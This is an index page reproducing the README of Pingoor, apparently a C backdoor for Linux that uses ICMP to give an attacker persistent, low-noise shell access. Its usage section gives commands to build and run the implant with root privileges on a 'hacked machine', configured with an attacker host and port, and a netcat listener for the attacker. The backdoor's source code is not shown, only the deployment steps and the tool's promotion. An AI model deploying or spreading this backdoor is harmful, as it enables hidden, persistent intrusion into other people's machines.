Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/MrEmpy/Pingoor

「🚪」Linux Backdoor based on ICMP protocol
https://github.com/MrEmpy/Pingoor

backdoor c hacking icmp linux persistence protocol security

Last synced: about 1 month ago
JSON representation

「🚪」Linux Backdoor based on ICMP protocol

Awesome Lists containing this project

README

        

「🚪」About Pingoor

Pingoor is a backdoor developed in C for the GNU/Linux operating system. Its main characteristic is to use the ICMP protocol to give the attacker access to the shell of a machine, making its access persistent with little noise.

## How to Use

```
# Hacked machine
$ git clone https://github.com/MrEmpy/Pingoor.git
$ cd Pingoor
$ HOST= PORT= make
$ sudo ./pingoor
```

```
# Attacker machine
nc -lnvp
```

## Buy me a coffee?